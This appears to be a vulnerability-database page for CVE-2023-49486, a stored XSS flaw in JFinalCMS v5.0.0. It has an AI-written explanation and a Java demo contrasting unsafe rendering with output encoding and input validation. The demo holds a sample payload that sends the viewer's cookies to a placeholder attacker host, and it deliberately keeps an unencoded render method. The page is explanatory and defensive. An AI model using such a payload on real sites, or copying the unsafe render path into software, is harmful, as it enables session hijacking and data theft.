VYPR
Moderate severity · NVD Advisory · Published Dec 8, 2023 · Updated Aug 2, 2024

CVE-2023-49486

Description

JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the model management department.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

JFinalCMS v5.0.0 has a stored XSS vulnerability in the model management department allowing arbitrary JavaScript injection.

Vulnerability Description

JFinalCMS v5.0.0 contains a stored cross-site scripting (XSS) vulnerability in the model management department. The application stores user-supplied input without validating it and later renders it into HTML without encoding, so an attacker can inject arbitrary HTML or JavaScript that persists on the server [2].

Exploitation

An attacker with a valid session for the model management interface submits a crafted payload in one of its fields. The payload is stored on the server and executed in the browser of any authenticated user who later views the affected page; no authentication bypass is required beyond that session [1][2].

Impact

Successful exploitation lets the attacker run arbitrary JavaScript in the victim's browser, which can lead to session hijacking, defacement, or theft of sensitive data. Because the payload is stored, every user who later views the compromised page triggers it, not only the original target [2].

Mitigation

The vulnerability is confirmed in JFinalCMS v5.0.0. At the time of publication no official patch had been released. Users should monitor the vendor's repository for a fix and, in the meantime, validate model management input against an allow-list and HTML-encode it at the point of output, since encoding on output also defuses payloads that were stored before the workaround was applied [1][2][3].
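The store-then-render loop that the Exploitation and Mitigation paragraphs describe, as an added Java example. This is not JFinalCMS or JFinal code: the in-memory store, the `ModelNameXssDemo` class, the allow-list pattern for model names, and the attacker.example host in the constructed payload are all assumptions for illustration.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Added example, not JFinalCMS code: a minimal "store then render" loop for a
 * model-management style record, showing why unencoded output yields stored XSS
 * and how output encoding plus input validation neutralise it.
 */
public class ModelNameXssDemo {

    // Constructed sample input standing in for what an attacker submits as a model name.
    // attacker.example is a placeholder host, not a real endpoint.
    static final String PAYLOAD =
        "<script>fetch('https://attacker.example/?c='+document.cookie)</script>";

    // Hypothetical persistent store standing in for the CMS database.
    static final Map<Integer, String> MODEL_STORE = new LinkedHashMap<>();

    // Assumed allow-list for the field: letters, digits, underscore, hyphen, 1..64 chars.
    static final Pattern MODEL_NAME = Pattern.compile("^[A-Za-z0-9_-]{1,64}$");

    /** Vulnerable behaviour: interpolate the stored value straight into HTML. */
    static String renderUnsafe(int id) {
        return "<td>" + MODEL_STORE.get(id) + "</td>";
    }

    /** HTML-encode the five characters that matter in element text and attribute values. */
    static String htmlEncode(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Hardened behaviour: encode at the point of output, whatever the store holds. */
    static String renderSafe(int id) {
        return "<td>" + htmlEncode(MODEL_STORE.get(id)) + "</td>";
    }

    /** Input validation at the save boundary: reject names outside the allow-list. */
    static boolean saveModel(int id, String name) {
        if (name == null || !MODEL_NAME.matcher(name).matches()) {
            return false; // rejected; the caller should report a validation error
        }
        MODEL_STORE.put(id, name);
        return true;
    }

    public static void main(String[] args) {
        // 1. Vulnerable path: the payload is stored verbatim and echoed verbatim,
        //    so the browser of every viewer executes the script.
        MODEL_STORE.put(1, PAYLOAD);
        System.out.println("unsafe : " + renderUnsafe(1));

        // 2. Output encoding alone already defuses the stored payload; the
        //    <script> tag is shown as text rather than executed.
        System.out.println("encoded: " + renderSafe(1));

        // 3. Validation at save time keeps such input out of the store altogether.
        System.out.println("save payload accepted?      " + saveModel(2, PAYLOAD));
        System.out.println("save 'article_v2' accepted? " + saveModel(3, "article_v2"));
    }
}
```

Encoding on output is the control that actually closes the stored XSS, because it protects against values already in the database; the allow-list is defence in depth and must be adapted to whatever characters the real field legitimately needs.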

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                    Affected versions   Patched versions
com.jfinal:jfinal (Maven)  <= 5.0.0            none

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

3

News mentions

0

No linked articles in our index yet.